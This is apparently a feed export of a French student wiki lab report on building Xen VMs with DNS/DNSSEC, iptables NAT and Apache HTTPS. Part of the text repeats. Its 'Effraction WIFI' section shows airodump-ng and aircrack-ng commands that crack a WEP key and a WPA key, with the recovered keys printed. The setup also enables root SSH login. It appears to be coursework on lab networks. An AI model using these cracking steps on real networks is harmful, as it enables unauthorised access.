&amp;lt;/syntaxhighlight&amp;gt;Puis dans le terminal, on utilise les commandes suivantes (à ne surtout pas utiliser sur capbreton !!)&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
mkfs -t ext4 /dev/xvda3&lt;br /&gt;
mkfs -t ext4 /dev/xvdb1&lt;br /&gt;
mount /dev/xvda3 /mnt&lt;br /&gt;
mv /var/* /mnt&lt;br /&gt;
umount /mnt&lt;br /&gt;
mount -a&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On peut maintenant relancer la machine pour verifier si la config reste.&lt;br /&gt;
&lt;br /&gt;
Enfin on répète le même schéma pour la machine mandataire.&lt;br /&gt;
&lt;br /&gt;
==== Adresses ipv4 et ipv6 ====&lt;br /&gt;
Tout d'abord dans notre machine des service, on donne une adresse ipv4 local et ipv6, on modifie donc le fichier /etc/network/interfaces :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.10.2/24&lt;br /&gt;
    gateway 192.168.10.1&lt;br /&gt;
&lt;br /&gt;
auto eth1&lt;br /&gt;
iface eth1 inet6 auto&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On va aussi ajouter le bridge depuis capbreton dans /etc/xen/SE4.Manjaro.cfg:&amp;lt;syntaxhighlight lang=&amp;quot;cfg&amp;quot;&amp;gt;&lt;br /&gt;
vif = [[...], 'mac=00:16:3E:36:79:D9,bridge=SE4']&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Et dans la machine mandataire on va donner une adresse ipv4 du reseau publique et privé:&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
auto lo                                                                             &lt;br /&gt;
iface lo inet loopback                                                              &lt;br /&gt;
&lt;br /&gt;
auto eth0                                                                           &lt;br /&gt;
iface eth0 inet static                                                              &lt;br /&gt;
        address 192.168.10.1/24                                                     &lt;br /&gt;
&lt;br /&gt;
auto eth1                                                                           &lt;br /&gt;
iface eth1 inet static                                                              &lt;br /&gt;
        address 193.48.57.166/24                                                    &lt;br /&gt;
        gateway 193.48.57.162                                                       &lt;br /&gt;
iface eth1 inet6 auto                                                               &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On ajoute au fichier resolv.conf le dns de google et on install les outils qui nous servirons pour la suite (iptables-persistant, ssh, bind9, apache 2...)&lt;br /&gt;
&lt;br /&gt;
==== Masquerade et ssh ====&lt;br /&gt;
Nous pouvons maintenant mettre en places les iptables pour s'occuper à la fois du ssh (redirection de port) et de la Masquerade avec les commandes suivantes :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.10.3:22&lt;br /&gt;
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.10.0/24&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Après avoir sauvegarder avec iptables-save, on décommente dans  &amp;lt;code&amp;gt;/etc/sysctl.conf&amp;lt;/code&amp;gt;:&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Enfin pour permettre de se ssh en root sur toutes les VM, on ajoute dans  &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Maintenant, il n'est plus obligatoire de passer par capbreton pour se connecter aux VM, nous utiliserons les commandes suivantes :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
ssh root@193.48.57.166 #pour la machine mandataire&lt;br /&gt;
ssh root@193.48.57.166 -p 2202 # pour la machine de service&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== DNS ====&lt;br /&gt;
&lt;br /&gt;
===== Machine de service =====&lt;br /&gt;
On débute par modifier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; , on y ajoute notre zone principale et celle de notre camarade :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
zone &amp;quot;archlinux.lol&amp;quot; {                                                              &lt;br /&gt;
        type master;                                                                &lt;br /&gt;
        file &amp;quot;/etc/bind/zones/db.archlinux.lol&amp;quot;;                                    &lt;br /&gt;
        allow-transfer{secondaries;};                                               &lt;br /&gt;
        also-notify{hiddensecondaries;};                                            &lt;br /&gt;
        notify yes;                                                                 &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
acl &amp;quot;secondaries&amp;quot; {                                                                 &lt;br /&gt;
        192.168.10.3;                                                               &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe8b:45ed;                                      &lt;br /&gt;
        192.168.10.1;                                                               &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:feaa:bff0;                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
masters &amp;quot;hiddensecondaries&amp;quot; {                                                       &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:feaa:bff0;                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
zone &amp;quot;archlinuxbtw.lol&amp;quot; {                                                           &lt;br /&gt;
        type secondary;                                                             &lt;br /&gt;
        file &amp;quot;/etc/bind/backup/db.archlinuxbtw.lol&amp;quot;;                                &lt;br /&gt;
        primaries{2001:660:4401:60a0:216:3eff:fe8b:45ed;};                          &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                           &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Puis on crée notre zone db.archlinux.lol :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
$TTL 400                                                                            &lt;br /&gt;
                                                                                    &lt;br /&gt;
@ IN SOA ns.archlinux.lol. admin.archlinux.lol. (                                   &lt;br /&gt;
           3611     ; Numéro de version                                             &lt;br /&gt;
          21600     ; Rafraîchissement (6h)                                         &lt;br /&gt;
           3600     ; Re-tentative (1h)                                             &lt;br /&gt;
        2592000     ; Expiration (30j)                                              &lt;br /&gt;
          86400     ; Cache négatif (24h)                                           &lt;br /&gt;
);                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
@ IN NS ns.archlinux.lol.                                                           &lt;br /&gt;
@ IN NS ns.archlinuxbtw.lol.                                                        &lt;br /&gt;
                                                                                    &lt;br /&gt;
ns IN A 193.48.57.166                                                               &lt;br /&gt;
@ IN A 193.48.57.166                                                                &lt;br /&gt;
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe36:79d9                                    &lt;br /&gt;
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe36:79d9                                     &lt;br /&gt;
                                                                                    &lt;br /&gt;
www IN CNAME archlinux.lol.                                                         &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Machine mandataire =====&lt;br /&gt;
Dans la machine mandataire, on doit passer les zones de nos machine de service en zone secondaire, ainsi, on aura un fichier tel que celui-ci :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
zone &amp;quot;archlinuxbtw.lol&amp;quot; {                                                           &lt;br /&gt;
        type secondary;                                                             &lt;br /&gt;
        file &amp;quot;/etc/bind/backup/db.archlinuxbtw.lol&amp;quot;;                                &lt;br /&gt;
        primaries{2001:660:4401:60a0:216:3eff:fe8b:45ed;};                          &lt;br /&gt;
};                                                                                  &lt;br /&gt;
zone &amp;quot;archlinux.lol&amp;quot; {                                                              &lt;br /&gt;
        type secondary;                                                             &lt;br /&gt;
        file &amp;quot;/etc/bind/backup/db.archlinux.lol&amp;quot;;                                   &lt;br /&gt;
        primaries{2001:660:4401:60a0:216:3eff:fe36:79d9;};                          &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
acl &amp;quot;secondaries&amp;quot; {                                                                 &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe8b:45ed;                                      &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe36:79d9;                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Enfin, il faut rajouter nos zones au Glue records de Gandi pour que notre DNS soit reconnu partout dans le monde.&lt;br /&gt;
&lt;br /&gt;
On peut d'ailleurs le vérifier sur le site https://dnschecker.org/&lt;br /&gt;
[[Fichier:Dns-check-thomas.png|centré|vignette]]&lt;br /&gt;
&lt;br /&gt;
==== DNSSEC ====&lt;br /&gt;
Afin de sécuriser notre DNS, on modifie notre &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
zone &amp;quot;archlinux.lol&amp;quot; {                                                              &lt;br /&gt;
        type master;                                                                &lt;br /&gt;
        file &amp;quot;/etc/bind/zones/db.archlinux.lol&amp;quot;;                                    &lt;br /&gt;
        allow-transfer{secondaries;};                                               &lt;br /&gt;
        also-notify{hiddensecondaries;};                                            &lt;br /&gt;
        notify yes;                                                                 &lt;br /&gt;
        key-directory &amp;quot;/etc/bind/keys&amp;quot;;                                             &lt;br /&gt;
        dnssec-policy &amp;quot;dnspol&amp;quot;;                                                     &lt;br /&gt;
        inline-signing yes;&lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
acl &amp;quot;secondaries&amp;quot; {                                                                 &lt;br /&gt;
        192.168.10.3;                                                               &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe8b:45ed;                                      &lt;br /&gt;
        192.168.10.1;                                                               &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:feaa:bff0;                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
masters &amp;quot;hiddensecondaries&amp;quot; {                                                       &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:feaa:bff0;                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
zone &amp;quot;archlinuxbtw.lol&amp;quot; {                                                           &lt;br /&gt;
        type secondary;                                                             &lt;br /&gt;
        file &amp;quot;/etc/bind/backup/db.archlinuxbtw.lol&amp;quot;;                                &lt;br /&gt;
        primaries{2001:660:4401:60a0:216:3eff:fe8b:45ed;};                          &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot; {                                                            &lt;br /&gt;
   keys {                                                                           &lt;br /&gt;
       ksk key-directory lifetime unlimited algorithm 13;                           &lt;br /&gt;
       zsk key-directory lifetime unlimited algorithm 13;                           &lt;br /&gt;
   };                                                                               &lt;br /&gt;
   nsec3param;                                                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;et on ajoute un répertoire pour les clés (auquel on donnera les permissions d'écriture) :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
mkdir /etc/bind/keys &lt;br /&gt;
chown bind:bind /etc/bind/keys &lt;br /&gt;
chmod 750 /etc/bind/keys&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Après avoir redémaré bind9 et named, on peut voir que les clés sont effectivement bien généré. Pour vérifier si notre DNS est sécurisé, il faudra passer par https://dnsviz.net/&lt;br /&gt;
[[Fichier:DNSSEC-thomas.png|centré|vignette]]&lt;br /&gt;
&lt;br /&gt;
==== serveur Apache ====&lt;br /&gt;
&lt;br /&gt;
===== Sur la machine de service =====&lt;br /&gt;
&lt;br /&gt;
En premier lieu, on va générer notre clé avec :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
openssl req -nodes -newkey rsa:2048 -sha256 -keyout archlinux.lol.key -out archlinux.csr&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Une fois la clé généré on récupère la certification la certification sur Gandi&lt;br /&gt;
&lt;br /&gt;
On va ensuite créer notre site dans &amp;lt;code&amp;gt;etc/apache2/sites-available/archlinux.lol.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
La page html sera enregistré dans &amp;lt;code&amp;gt;etc/www/archlinux.lol&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On effectue aussi une redirection du port http vers https.&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;                                                                  &lt;br /&gt;
    ServerName archlinux.lol                                                        &lt;br /&gt;
    ServerAlias www.archlinux.lol                                                   &lt;br /&gt;
    Redirect permanent / https://archlinux.lol/                                     &lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;                                                                      &lt;br /&gt;
                                                                                    &lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;                                                                 &lt;br /&gt;
    ServerName archlinux.lol                                                        &lt;br /&gt;
    ServerAlias www.archlinux.lol                                                   &lt;br /&gt;
    DocumentRoot /var/www/archlinux.lol                                             &lt;br /&gt;
                                                                                    &lt;br /&gt;
    &amp;lt;Directory /var/www/archlinux.lol&amp;gt;                                              &lt;br /&gt;
        Options Indexes FollowSymLinks                                              &lt;br /&gt;
        AllowOverride All                                                           &lt;br /&gt;
        Require all granted                                                         &lt;br /&gt;
    &amp;lt;/Directory&amp;gt;                                                                    &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    ErrorLog ${APACHE_LOG_DIR}/error.log                                            &lt;br /&gt;
    CustomLog /var/log/apache2/secure_access.log combined                           &lt;br /&gt;
                                                                                    &lt;br /&gt;
    SSLEngine on                                                                    &lt;br /&gt;
    SSLCertificateFile /etc/ssl/certs/archlinux.lol.crt                             &lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/private/archlinux.lol.key                        &lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/certs/GandiCert.pem                            &lt;br /&gt;
                                                                                    &lt;br /&gt;
    SSLVerifyClient None                                                            &lt;br /&gt;
                                                                                    &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;                                                                      &lt;br /&gt;
                                                                                    &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Notre site est maintenant accessible en ipv6. Il faut maintenant configurer la machine mandataire pour qu'il le soit aussi en ipv4.  &lt;br /&gt;
&lt;br /&gt;
===== Sur la machine de mandataire =====&lt;br /&gt;
Là aussi, après avoir récupéré les clé et certificat de la machine mandataire, on va crée un fichier &amp;lt;code&amp;gt;etc/apache2/sites-available/archlinux.lol-proxy.conf&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;                                                                  &lt;br /&gt;
    ServerName archlinux.lol                                                        &lt;br /&gt;
    ServerAlias www.archlinux.lol                                                   &lt;br /&gt;
    Redirect permanent / https://archlinux.lol/                                     &lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;                                                                      &lt;br /&gt;
                                                                                    &lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;                                                                 &lt;br /&gt;
    ServerName archlinux.lol                                                        &lt;br /&gt;
    ServerAlias www.archlinux.lol                                                   &lt;br /&gt;
                                                                                    &lt;br /&gt;
    SSLProxyEngine on                                                               &lt;br /&gt;
    ProxyPass / https://archlinux.lol/                                              &lt;br /&gt;
    ProxyPassReverse / https://archlinux.lol/                                       &lt;br /&gt;
    ProxyPreserveHost on                                                            &lt;br /&gt;
                                                                                    &lt;br /&gt;
    SSLEngine on                                                                    &lt;br /&gt;
    SSLCertificateFile /etc/ssl/certs/archlinux.lol.crt                             &lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/private/archlinux.lol.key                        &lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/certs/GandiCert.pem                            &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    ErrorLog ${APACHE_LOG_DIR}/error.log                                            &lt;br /&gt;
    CustomLog ${APACHE_LOG_DIR}/access.log combined                                 &lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;                                                                      &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Notre site est maintenant disponible partout et en https.&lt;br /&gt;
[[Fichier:Site-thomas.png|centré|vignette]]&lt;br /&gt;
&lt;br /&gt;
==== Effraction WIFI ====&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo airodump-ng wlan1&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On trouve cracotte06 avec son adresse et son chanel&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo airodump-ng wlan1 --write dump --bssid 04:DA:D2:9C:50:55 -c4&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Le fichier dump étant crée, on récupère la clé avec la commande suivante :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo  aircrack-ng -b 04:DA:D2:9C:50:55 dump-22.cap&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
                                                                                     Aircrack-ng 1.7 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                                                                       [00:00:00] Tested 525 keys (got 63977 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    1/  2   20(74752) 5B(73216) F0(73216) 1E(72704) 77(72192) 12(71936) 78(71936) ED(71936) 21(71680) EF(71680) 58(71424) AE(71424) 4D(71168) 5A(70656) 02(70400) &lt;br /&gt;
    1    5/  1   48(74496) DA(71936) 47(71680) 55(71680) B9(71168) BD(70656) DE(70656) 01(70400) 77(70400) A2(70400) 6C(70144) 74(70144) 7C(70144) 8E(70144) 92(70144) &lt;br /&gt;
    2   73/  2   CE(66560) CC(66304) E2(66304) DD(66048) ED(66048) 69(65536) 97(65536) A7(65536) AC(65536) B8(65536) 44(65280) 72(65280) D7(65280) EA(65280) F4(65280) &lt;br /&gt;
    3    7/ 11   5C(73984) 14(72960) 6E(72960) E8(72448) 00(71424) EB(71424) 04(71168) 23(70912) 35(70912) AB(70912) 58(70656) 1B(70400) CA(70400) D4(70400) FE(70400) &lt;br /&gt;
    4    0/  3   F6(92416) 2D(73472) 30(72704) 6A(71680) 9D(71680) BD(71680) C9(71680) 2B(71168) 3D(70400) 52(70400) C8(70400) D8(70400) 49(70144) F8(70144) FE(69632) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ FF:FF:FF:FF:FA:BC:07:CB:AE:EE:EE:EE:EE ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo airodump-ng wlan1 --write dump --bssid 44:AD:D9:5F:87:05 -c13&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo  aircrack-ng -a2 -w dico.txt -b 44:AD:D9:5F:87:05 dump-23.cap&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
                               Aircrack-ng 1.7 &lt;br /&gt;
&lt;br /&gt;
      [00:28:29] 66973408/100000000 keys tested (39839.22 k/s) &lt;br /&gt;
&lt;br /&gt;
      Time left: 13 minutes, 48 seconds                         66.97%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 66684666 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 63 5F 7F 36 2C 70 49 04 6A 29 11 FE C8 C1 0C FD &lt;br /&gt;
                       4D 16 18 BE C9 48 70 31 C5 7B 13 BD E1 02 8A 15 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;/div&gt;</summary>
		<author><name>Tdelobel</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Fichier:DNSSEC-thomas.png&amp;diff=12537</id>
		<title>Fichier:DNSSEC-thomas.png</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Fichier:DNSSEC-thomas.png&amp;diff=12537"/>
		<updated>2026-02-27T13:38:30Z</updated>

		<summary type="html">&lt;p&gt;Tdelobel : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;.&lt;/div&gt;</summary>
		<author><name>Tdelobel</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Fichier:Dns-check-thomas.png&amp;diff=12535</id>
		<title>Fichier:Dns-check-thomas.png</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Fichier:Dns-check-thomas.png&amp;diff=12535"/>
		<updated>2026-02-27T13:36:17Z</updated>

		<summary type="html">&lt;p&gt;Tdelobel : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;.&lt;/div&gt;</summary>
		<author><name>Tdelobel</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Fichier:Site-thomas.png&amp;diff=12532</id>
		<title>Fichier:Site-thomas.png</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Fichier:Site-thomas.png&amp;diff=12532"/>
		<updated>2026-02-27T13:33:26Z</updated>

		<summary type="html">&lt;p&gt;Tdelobel : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;.&lt;/div&gt;</summary>
		<author><name>Tdelobel</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E6&amp;diff=12515</id>
		<title>Atelier SysRes SE4 2025/2026 E6</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E6&amp;diff=12515"/>
		<updated>2026-02-27T13:09:32Z</updated>

		<summary type="html">&lt;p&gt;Tdelobel : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Compte rendu : ===&lt;br /&gt;
&lt;br /&gt;
==== Création du bridge dans capbreton ====&lt;br /&gt;
Avant de créer nos VM, on ajoute notre bridge à capbreton  dans SE42026_cpayet_tdelobel&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
auto pont_pacman&lt;br /&gt;
iface pont_pacman inet manual&lt;br /&gt;
    bridge_ports none&lt;br /&gt;
    up ip link set $IFACE up&lt;br /&gt;
    down ip link set $IFACE down&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On utilise ifup pour le démarrer.&lt;br /&gt;
&lt;br /&gt;
==== Création des VMs ====&lt;br /&gt;
Pour créer la VM de service et mandataire, on utilise les commandes suivantes&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
xen-create-image --hostname=SE4.Manjaro         --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force&lt;br /&gt;
xen-create-image --hostname=SE4.LinusTorvalds   --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Manjaro sera la machine de service et LinusTorvalds la mandataire&lt;br /&gt;
&lt;br /&gt;
Puis &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
xen create /etc/xen/SE4.Manjaro.cfg&lt;br /&gt;
xen create /etc/xen/SE4.LinusTorvalds.cfg&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nos machines sont maintenant listées.&lt;br /&gt;
&lt;br /&gt;
==== Partitionnement ====&lt;br /&gt;
&lt;br /&gt;
===== Sur capbreton =====&lt;br /&gt;
Tout d'abord on se donne 10g d'espace pour notre machine virtuelle :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
lvcreate -n SE4.Manjaro.var -L 10G virtual&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On ajoute dans /etc/xen/SE4.Manjaro.cfg : &amp;lt;syntaxhighlight lang=&amp;quot;cfg&amp;quot;&amp;gt;&lt;br /&gt;
disk = [&lt;br /&gt;
            [...],&lt;br /&gt;
            'phy:/dev/virtual/SE4.Manjaro.home,xvda3,w',&lt;br /&gt;
            'phy:/dev/virtual/SE4.Manjaro.var,xvdb1,w'&lt;br /&gt;
        ]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Sur la VM =====&lt;br /&gt;
Afin que la configuration soit enregistré, on modifie le /etc/fstab en ajoutant les lignes suivantes :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
/dev/xvda3 /var ext4 defaults 0 2&lt;br /&gt;
/dev/xvdb1 /home ext4 defaults 0 2&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Puis dans le terminal, on utilise les commandes suivantes (à ne surtout pas utiliser sur capbreton !!)&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
mkfs -t ext4 /dev/xvda3&lt;br /&gt;
mkfs -t ext4 /dev/xvdb1&lt;br /&gt;
mount /dev/xvda3 /mnt&lt;br /&gt;
mv /var/* /mnt&lt;br /&gt;
umount /mnt&lt;br /&gt;
mount -a&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On peut maintenant relancer la machine pour verifier si la config reste.&lt;br /&gt;
&lt;br /&gt;
Enfin on répète le même schéma pour la machine mandataire.&lt;br /&gt;
&lt;br /&gt;
==== Adresses ipv4 et ipv6 ====&lt;br /&gt;
Tout d'abord dans notre machine des service, on donne une adresse ipv4 local et ipv6, on modifie donc le fichier /etc/network/interfaces :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.10.2/24&lt;br /&gt;
    gateway 192.168.10.1&lt;br /&gt;
&lt;br /&gt;
auto eth1&lt;br /&gt;
iface eth1 inet6 auto&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On va aussi ajouter le bridge depuis capbreton dans /etc/xen/SE4.Manjaro.cfg:&amp;lt;syntaxhighlight lang=&amp;quot;cfg&amp;quot;&amp;gt;&lt;br /&gt;
vif = [[...], 'mac=00:16:3E:36:79:D9,bridge=SE4']&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Et dans la machine mandataire on va donner une adresse ipv4 du reseau publique et privé:&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
auto lo                                                                             &lt;br /&gt;
iface lo inet loopback                                                              &lt;br /&gt;
&lt;br /&gt;
auto eth0                                                                           &lt;br /&gt;
iface eth0 inet static                                                              &lt;br /&gt;
        address 192.168.10.1/24                                                     &lt;br /&gt;
&lt;br /&gt;
auto eth1                                                                           &lt;br /&gt;
iface eth1 inet static                                                              &lt;br /&gt;
        address 193.48.57.166/24                                                    &lt;br /&gt;
        gateway 193.48.57.162                                                       &lt;br /&gt;
iface eth1 inet6 auto                                                               &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On ajoute au fichier resolv.conf le dns de google et on install les outils qui nous servirons pour la suite (iptables-persistant, ssh, bind9, apache 2...)&lt;br /&gt;
&lt;br /&gt;
==== Masquerade et ssh ====&lt;br /&gt;
Nous pouvons maintenant mettre en places les iptables pour s'occuper à la fois du ssh (redirection de port) et de la Masquerade avec les commandes suivantes :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.10.3:22&lt;br /&gt;
